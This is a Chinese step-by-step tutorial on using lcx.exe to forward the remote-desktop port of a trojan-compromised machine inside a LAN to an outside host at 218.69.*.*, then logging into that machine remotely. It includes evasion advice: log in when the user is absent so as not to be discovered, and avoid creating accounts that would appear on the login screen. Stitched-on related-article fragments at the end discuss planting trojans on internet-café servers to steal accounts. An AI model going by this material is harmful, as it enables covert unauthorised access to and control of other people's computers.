windows中使用Lcx进行内网端口转发【图解】教程

在理论上只要网络连接的计算机都是可以访问的,但是在实际中往往由于技术水平等原因,很难实现它;例如局域网中的某台计算机仅仅开放了Web服务,该服务仅能供内网用户使用,而外网用户根本没有办法直接访问。因此要想让外网用户能够访问局域网中的系统服务,这必须进行端口映射等操作才行。端口映射在外网连接内网的时候经常用到,特别是要登陆远程终端服务时,使用端口映射就非常方便。

Lcx.exe是一个端口转发工具,相当于把机器A上的3389端口转发到具有外网IP地址的B机上,这样连接B机的3389端口就相当于连接A机的 3389端口。Lcx程序多用于被控制计算机(机器A)处于内网的情况,被控制机可能中了木马程序,虽然能够进行控制,但还是没有使用远程终端登陆到本机进行管理方便,因此在很多情况下,都会想方设法在被控制计算机上开启3389端口,然后通过lcx等程序进行端口转发,进而在本地连接到被控制计算机的远程终端并进行管理和使用。

1确定被控制计算机(机器A)的IP地址

在被控制计算机上开启远程终端,然后执行“ipconfig /all”命令,查看其网络配置情况,如图1所示,该计算机的ip地址为“192.168.80.129”

 

图1 确定被控制计算机的IP地址

2在被控制计算机(机器A)上执行端口转发命令

在被控制计算机上执行“lcx –slave 218.69.*.* 51 192.168.80.129 3389”,如图2所示,执行完毕后会给出一些提示,如果显示为“Make a Connection to 218.69.*.*:51”则表示端口转发正确。

 

图2在被控制计算机上执行转发命令

说明

lcx一共有三条命令,第一条命令(lcx –lister 51 3389)是在具有外网独立IP的计算机上执行,表示在本机上监听51端口,该端口主要是接受被控制计算机3389端口转发过来的数据。第二条命令 (lcx –slave 218.69.*.* 51 192.168.80.129 3389)表示将本机IP地址为192.168.80.129的3389端口转发到远程地址为“218.69.*.*”的51端口。第三条命令是端口转向。

3在本机(机器B)上执行监听命令

在本机上打开DOS命令提示符,然后到lcx.exe程序所在路径执行“lcx –lister 51 3389”命令,监听51端口,监听成功后,会显示如图3所示的数据。

 

图3 在本机上监听51端口

注意

(1)在本机上监听的端口必须是未使用的端口,可以使用“netstat -an |find “51″ ”命令进行查看,如果没有显示结果则表示51端口可以用来进行监听。

(2)被控制计算机与本机成功建立连接后会不停的显示连接数据,如图4所示,如果未出现数据发送和接受的情况,说明连接建立不成功。

 

图4 成功建立连接

4在本机使用远程终端进行登录

在DOS提示符下输入“mstsc”命令打开远程终端连接器,输入“127.0.0.1”后单击“连接”按钮进行远程终端连接,在出现登录界面后分别收入用户名和密码,验证通过后,即可远程进入被控制计算机的桌面,如图5所示,输入“ipconfig /all”以及“net user”命令来查看网络配置情况以及用户信息。

 

图5远程登入被控制计算机

注意

(1)如果被控制计算机是服务器,则在登陆时可以直接进行登陆;如果被控制计算机是Windows XP系统,则最好选择用户不在计算机的时间进行登陆,否则容易被发现。

(2)不要轻易在被控制计算机上建立账号,尤其是Windows XP,建立帐号后,会立即在登陆界面中进行显示。

5查看本地连接

在被控制计算机上使用“netstat -an”查看当前所有的连接时,可以看到被控制计算机时在跟自己进行远程终端连接,如图6所示,而实际的3389端口是跟本机的51端口进行连接的。

 

图6 查看实际网络连接

本案例通过使用lcx端口转发程序,成功的在本机连入被控制计算机的内网,可以很方便的对该计算机进行远程管理,在进行内网渗透时尤为有用。

时间: 2024-10-24 23:34:54

windows中使用Lcx进行内网端口转发【图解】教程的相关文章

内网端口映射定义及设置方法

  网吧中放置木马的主要目的是窃取QQ号.游戏账号等敏感资料,作为网吧管理员必须懂得常见的"挂马"方法,这样才能在遭遇木马时做到从容不迫,轻松除马. 要在网吧中挂马,需要将木马植入到服务器.入侵服务器的方法这里就不再细述了.在入侵服务器后,植入木马之前有一个问题需要解决,这就是如何将服务器中的木马与外部网络连接起来?要解决这个问题,就需要先做好端口映射(PortMapping). 什么是端口映射?端口映射又叫端口转发,又叫虚拟服务器,各个品睥路由器不同叫法不一样. 端口映射过程就如同:

外网访问内网-端口映射,内网ip映射

问题描述 端口映射,内网ip映射 广域网访问局域网的服务器最便捷的办法,除了用花生壳外,还有什么办法? 如果用路由器设置,什么品牌的可以? 解决方案 一般的路由器都有这样的设置的把, 把内网某个内网ip映射到指定的端口 解决方案二: 首先纠正你一点,外网访问内网,花生壳根本办不到.花生壳是ddns,仅仅解决了一个动态ip的自动维护它的dns指向的功能. 外网访问内网的前提是,你的内网通过路由器连接到公网上,这个公网有公网ip,你对路由器有控制能力.你只要做端口映射就可以访问到了.任何品牌基本都可

配置nginx反向代理用做内网域名转发

情景 由于公司内网有多台服务器的http服务要映射到公司外网静态IP,如果用路由的端口映射来做,就只能一台内网服务器的80端口映射到外网80端口,其他服务器的80端口只能映射到外网的非80端口.非80端口的映射在访问的时候要域名加上端口,比较麻烦.并且公司入口路由最多只能做20个端口映射.肯定以后不够用. 然后k兄就提议可以在内网搭建个nginx反向代理服务器,将nginx反向代理服务器的80映射到外网IP的80,这样指向到公司外网IP的域名的HTTP请求就会发送到nginx反向代理服务器,利用

nginx.conf配置文件示例:内网服务器转发web目录

下面这段代码是转发到内网服务器上web目录的,需要配置IIS,这里贴出nginx.conf配置文件的代码供大家学习借鉴. server { &http://www.aliyun.com/zixun/aggregation/37954.html">nbsp;       listen       80;         server_name  www.ithov.com; charset utf-8; location / {             index login.asp

Proxmox ve创建虚拟机、设置NAT端口转发图文教程

    前几天折腾2欧的时候看到后台有Proxmox,就试了下,因为母鸡cpu的限制,不能虚拟kvm的小鸡,只能折腾openvz的了.       Proxmox 是一个集成了KVM.OpenVZ的开源虚拟化管理平台.基于Debian Etch构建.Proxmox有简单易用的WEB控制面板.让用户可以在网页环境中轻松的建立和管理KVM以及OpenVZ构架的虚拟机.   二.安装Proxmox   我在网上看到很多都是通过官方提供的ISO镜像或者独服自己提供模板来装的Proxmox,自己编译安装还

windows中关闭137,138,139危险端口方法

137端口:137端口主要用于"NetBIOS Name Service"(NetBIOS名称服务). 138端口都属于UDP端口,它们在局域网中相互传输文件信息时,就会发生作用.而138端口的主要作用就是提供NetBIOS环境下的计算机名浏览功能. 138端口它是为共享而开放的,应该禁止别人共享你的机器,所以要把这些端口全部关闭,方法是:单击"开始→控制面板→系统→硬件→设备管理器",单击"查看"菜单下的"显示隐藏的设备",

windows下MySQL 5.7.3.0安装配置图解教程(安装版)_Mysql

首先MySQL官方网站从http://dev.mysql.com/downloads/下载MySQL服务器安装软件包,我下载为版本" mysql-installer-community-5.7.3.0-m13.msi"不多说,双击进入安装. 如下图: 点击上图红框"Install MySQL Products"进入安装界面,如下图: 根据上图当中第一步骤与第二步骤,进入下图: 进入设置界面,如下图: 在原来旧的版本当中,安装类型有3种安装类型:Typical(典型安

通过rinetd实现端口转发来访问内网的服务

一.   问题描述    通过外网来访问内网的服务 二.   环境要求    需要有一台能够外网访问的机器做端口映射,通过数据包转发来实现外部访问阿里云的内网服务 三.   操作方法    做端口映射的方案有很多,Linux下的ssh tunnel和windows下的portmap等等,这里分享一个更稳定和简单的小工具rinetd 四.   下载安装 $ wget http://www.boutell.com/rinetd/http/rinetd.tar.gz $ tar -xvf rinetd

通过rinetd实现端口转发,同时访问阿里云RDS的内外网

之前分享过一些通过外网连接内网的RDS数据库的方法(linux下的ssh tunnel和windows下的portmap) 今天再分享一个更稳定和简单的小工具rinetd 配置方法如下: 1 wget http://www.boutell.com/rinetd/http/rinetd.tar.gz&&tar -xvf rinetd.tar.gz&&cd rinetd 2 sed -i 's/65536/65535/g' rinetd.c (修改端口范围,否则会报错) 3 m